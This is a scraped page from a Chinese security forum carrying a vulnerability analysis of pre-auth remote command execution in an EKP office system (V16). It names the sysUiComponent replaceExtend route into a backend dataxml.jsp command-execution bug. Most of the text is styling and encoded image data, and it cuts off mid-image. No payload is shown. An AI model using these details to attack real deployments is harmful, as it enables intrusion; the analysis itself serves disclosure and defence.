*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,d09GMgABAAAAAN3MAA4AAAAB3OQAAN1sAAQAxQAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4GYACFQhEICobjZIW0WgE2AiQDkSoLiFwABCAFhwAHqx4/d2ViZgZbBYBxhnF7IVHRnVDqt/fSG4cZBbodREHF77duhex8Mb6j/fmp2f///78gWYzh7g+8R0BUdTpLW1Uzsp76hCzI4aYUR8pes2MocNQ2YvKKbApmLWu/bv7ALkc1B+aeVCsz1YrjaYsVnkxwJujIZWwn5gjVfIgmhc3in0QhmV5maXZNM1xTKb1RmAdM/OaNTl/mtoIrW/khyLhT5xe7bVH4fZGXVpFvuchr9JDG3Mcoh7mswgQxQVK8XUETf1CxbfHOtB+kxeznYk7Tc0VQvAs3ZHw4fkX+eKbZae3Ga4yTuqW4ivdfEynv1GrGUEu4OnTzzcjOrvA9euKJJn93ZAnl2I4SDS0d71OE52stez2NiwEECTzlA0CWsDwIHxnjUh747oQ+4/cPz8+ttyIXzTZiY4wxosaI3F8QvVEho0JSWt0kWiUlDEAMbFRUsJgZKGcUGHVmnTf/P6e9Zz8P5jE8wRUMwwiRViAUd39KoXMKlV2UsWpdN25qBwAP0n35Mpmf+bvg9ZtKfIuWauEin8QFPnQhqjHdubkgORdjw60F1Hm3BRSOpS8r3c6XU/9/JMdJqrGKafqQYMBQSgy6BEkN2ozu0jp/p5EMSdFJDElKASzB5dwOFDbt5x1Rt2WVqTHYdx+5Xp9Ufm9KBtkmlgURoo8tj////Z9a0ixLyWLsAGIB+Eoqp6lnC5QCOfox/PnFQ4BJkcOC2NkzE2qySKkd7EB0X2SssjuTJ374/zn7zhne2jm7fiUkyEiwBGin9SnjfqWFGqXyrNPtdoTk/iS7nvwSR9pOTPBCIAlSpUo50teOPKprzxRrm9+ChuQfqzJE8Bbl26JpGFbqfrX84LxQBx3aIebKK51pt3LCe3dPaIcrAGrDFXAd7qRJJ7W7e7L0z7L00hPYSSrgWlB0qYKDoXOBwQPRquJvWcPzc+sBI3pUj9GjxgIGG+yvAlaMBaxgY2PUYERvgIiAEiaIJ1NUPDFQwcLAujTqTr1QLioZ3GbIHTEdYnpCesfDy9dvB4B4+Vba/vPP6au23oy0eHeVXxgzGuGtTG1zt4lDgpCDCDHInDqlDmgAeK+jJZIEuJ9bmCpbL8Z0vvFwr84+jRRnNzOSkyPg6srryLIDS/CREjejVnMMEDioCIrqv3XCmO6lA/N4Lf1ua0oVVekIinqBkbCY5N/3nRqiAWisW2xsNBbsUxu11kXxz8lWB4c3sN3ekYiAEGAAByO382+qZQuQxImXstYh60J3LrpdOaX23OWinx9mwP//fAAzA5CcGYAkAFIiAEriDAiJAMndAQjqAJCgKWrvHpebtWs/re72nVaXEjCgtAQp6RHUJspJ2gupsq9yyLHo/Vy5u+v8rqhclS5d2qVdtLX/3nRVKsauMS47Z4JoNru6yNjUBvn73WqpW0jQLWxLIxDCSgwlBzcSzMxJwozQOiGBVpiZtY7hnPstYGiNbWEF5wTrxFmYdcxak56xPgku3HDDS8ILnYkuDi8MnQvCI3jcT216ZaMrjPl5GWYAIByhr51xVXZju0G5EtXIfqYwq7s4NLhgeu2nvYsxpRohhSTYCoItYM27+X/m/PxE6+tJNw9faWYRRohBDMIYh3z8h1yy6QEzqRlrM0ghSOsQ+ShkO2LOCgqadP5MQjyDih2k2EHqttndgXsdI1Oga0jEvEe50TXItrpN9NIEBcQhscEo44wiaoTxcU2AAvxdwsQC+Ppw/kum+fD5u8BrSYNSgIiihg2AMccnArqsYJ2gmNlhnADg/vHOjV6AesO+/MmrlN8grD8CAnD8ERERq2e4xrw61HwHQX8hVkPGCIADEJRmLCNsYzeTnAWcZnbH7osIzSEbGYvULv/7qJdPYalrqK/xvNrG/vmB3hmw4yOMWoM+4zyt158PeG80n4NP5BkGyRJu62dDPTINSpg2S/aEQH1fYmH9GoDFAURIy8JOAPQ+olD/RszU+DcQnfyXjKqKpWkxC3B+cn7qu+8P/zw8HGWmGhXmmMGhgEUOgwwppiB4OIEDmIPxlOSe+zqPfVuXeRqHvhveVZsW/nw1V6A6M4KhLcWhuFu/4O3fRKWuHfUc9G7G94SL4vR/rZ8Ub5iZP5cz9tlk/wtG9+s3PxmuMdIjm1qu7k+tQYQCZTRkuAtSmLSs0uOxI64zaboh3cTIf720EgwvjBKMYQmjxBNnkRyxseNc0nKZeZURGC+VioZVLFpliSPBSR6sepFcJRcWptiE61cRFstAMUgzXiIy9GFHp+YbdyPuTxi7mhkEy8HFEDtgQNiOpK3nWM1fDipB52FSVfCgaWZDZnBCmAEeY8qnhJXDtZpO3WARXEKSWONEF/OsMAUcncfXXJFOO07iwB9ZEC0Rx0w1XBF7LMNQps6RTRBgUkR4wysExmnkzVyanU2yQYoszPOCt7CyWSNhx2qJx6pQUFg9hF2rc4J4PRPD0s0/9mU9Xqti6iyt5m0wwu0LiQ7ss4x0xMnZYuElJ+YetZyQxFx641j/Yal5weLc8H/4fYKnutlzOe9R93rRMaSyJxXDwDOMtpVPhX8gHQkPZmFUmIukZ5itm4mgwdiCoXPLPt00dun4zJgyQ9WC7G9fKMSWv+rce6CmkNdcMj+29sKV6uuvzwGeYccKULEvDBbrFO98vT95Kr/X7EtB7aHcN4I8HwSyFyfYSQs5dWoQETxfhzg8XPRHDn4aAy4I0jgMd/YKhhTQGIIUaXr2SIGtQ7a8shpQ3Kd5HJl3uSm6jiggOo0lmJgU7BnW+tsbN8Ytnz/NF85mdb1xJBbSr53bKHWNFTs3NfjC7NyZs68AVT/AmfztCK2JuKyYoe3JQOL1Ez4+e4nP3Tznw51cp8n/f29xXJIeDFoytH2UdswpLxZj5TQ/jKFp0HleHN6iBgbGIDNIoG0AbzSe+hYvI/CmIZ9/+tzFx4LT+VwmKJiHptTdPu9IqvO/cQB4Z8WYj9vFB3NNh/CqqTs3L8sqbfk18wPSsZY1c3ac68eisCvjt+6GslRjWA1Zxq+qdEAqc7sJOkCYAQZdZAG6Znb2s8hRfrlyeWqbnEMQ6RI2UMe1AQiF2QdBy28lB0y3Y9QUnneWbXwuEZlXIjGOWtQT75f9QOantcglVhUBA9/nscgFUqkPfpE3sEQNV0z5MgnVbqu6yqG0r1FihEcFynAafHXrm5sP+HRIVMrrc83SlwaAHpUNNtGUAG/NorLNojJrBbedljpgk7Y8n6QG7/0NlwJtE+j0URxOmtVfeGtPSSRmNoSRyVr0HTRbX6Vk74l5MrdxqLL/wsT+m8xKkTi52Q2Vbxac4ZGt4Arfhrgb/AND4tFY3Xm/Toh0KeIA86aziD28hvsDsGZM3xLKLrjCGsjCSanjTV/lp53WIUI5X7DkOtim0kaMQABwbaw1JvjjCooVnahJrl2NbeOlHmQesdeWcDDm151Uw4itkyRyhHa+o8AqzpAolQfERlyYrXU8TcoyZc3bc2TTc9bOxCSFlgOR+CCm78ShGPMgUNHUVT+NGMgx9p5S8ojoislOGDXJ/HWbpevnAhZjcJG83YRHZrg4cCyLbyfJZI3zAA43Mui7Z//EogzN/udIIqnSdh6czyF/f34cAaTNOCJtklgk8XEIm2roZAY9panWtZblERHrIhdamihzQ9G2dGx+KoTBSBdtWsddqEJaROCI9aSpbRbbKkm2iJSmPo9YyQRe6KnaxDO5/G4Kofm8n6jc6PLyujtlEPm9TWjKBUTWEmENgIcjSPJu8Kez/W0AQSD+uunlV58AGIOEAnOKGdJJPzDL9PHxvFpS0+BkDk/hBSfK9wOjj9+TiDzPD9nA03EcaR0V+XC5e98nuyq4N5VTHJYHXyrmvTNVz2v8PaVPXoRE184+h7lQcjXseY0bfJd/5ctB
<style>.highlight .c{color:#8f5902;font-style:italic}.highlight .k{color:#204a87;font-weight:bold}.highlight .l{color:#000}.highlight .n{color:#000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .p{color:#000;font-weight:bold}.highlight .cm{color:#8f5902;font-style:italic}.highlight .cp{color:#8f5902;font-style:italic}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kc{color:#204a87;font-weight:bold}.highlight .kd{color:#204a87;font-weight:bold}.highlight .kr{color:#204a87;font-weight:bold}.highlight .kt{color:#204a87;font-weight:bold}.highlight .m{color:#0000cf;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}.highlight .nb{color:#204a87}.highlight .nf{color:#000}.highlight .nn{color:#000}.highlight .nx{color:#000}.highlight .nt{color:#204a87;font-weight:bold}.highlight .mi{color:#0000cf;font-weight:bold}.highlight .s2{color:#4e9a06}.highlight .s1{color:#4e9a06}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media(max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style>@media(pointer:coarse){@media only screen and (max-device-width:1024px){}@media only screen and (max-device-width:414px){}@media only screen and (max-device-width:320px){}}</style><style>@media screen and (max-width:768px){}</style><style>/*!
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15006&amp;from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>某凌 EKP 前台远程命令执行漏洞分析</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/56506>
<span class="username cell"> Le1a</span></a> <span class=i-seprator> / </span>
<span> 2024-07-08 18:57:39</span><span class=i-seprator> / </span>
<span>发表于四川 / </span>
<span>浏览数 666</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(0)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<p>作者Le1a@微步漏洞团队</p>
<h1 id=toc-0>漏洞描述</h1>
<p>某凌 EKP 由深圳市某凌软件股份有限公司开发,是一款面向中小企业的移动化智能办公产品。</p>
<p>该系统存在远程命令执行漏洞,攻击者能够借助 <code>sysUiComponent</code> 接口的 <code>replaceExtend</code> 方法,把 <code>dataxml.jsp</code>后台命令执行漏洞转化为前台命令执行漏洞。</p>
<h1 id=toc-1>影响版本</h1>
<pre><code>version = V16</code></pre>
<h1 id=toc-2>漏洞分析</h1>
<h2 id=toc-3>前置漏洞</h2>
<p>该漏洞属于后台 dataxml.jsp 远程命令执行的前台绕过版本,接下来先介绍一下此后台漏洞的原理。</p>
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185418-6ceea6da-3d18-1.png><img src="data:image/png;base64,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
<p>在此处执行了 <code>treeBean</code><code>getDataList</code> 方法,并传入了请求的参数。而 <code>SysFormulaSimulateByJS</code> 类继承了 <code>IXMLDataBean</code>,其 getDataList 方法如下:</p>
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185434-764c0380-3d18-1.png><img src=data:image/png;base64,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